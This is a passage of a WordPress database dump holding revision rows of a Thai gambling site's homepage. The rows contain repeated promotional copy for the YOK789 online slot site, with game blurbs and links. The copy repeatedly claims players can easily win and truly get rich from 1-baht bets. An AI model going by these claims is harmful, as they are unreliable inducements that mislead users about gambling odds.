คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <b>ปั่น สล็อต ฟรี</b> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 07:44:27','2026-02-24 07:44:27','',44,'https://yok789ss.com/?p=327',0,'revision','',0),(328,3,'2026-02-24 07:44:27','2026-02-24 07:44:27','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><b>ใช้ทุนน้อยก็เล่นได้ </b></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><b>เกมหลากหลาย ค่ายดังครบ </b></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>YOK789 ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <b>ปั่น สล็อต ฟรี</b> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 07:44:27','2026-02-24 07:44:27','',44,'https://yok789ss.com/?p=328',0,'revision','',0),(329,3,'2026-02-24 07:44:28','2026-02-24 07:44:28','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><b>ใช้ทุนน้อยก็เล่นได้ </b></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><b>เกมหลากหลาย ค่ายดังครบ </b></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง 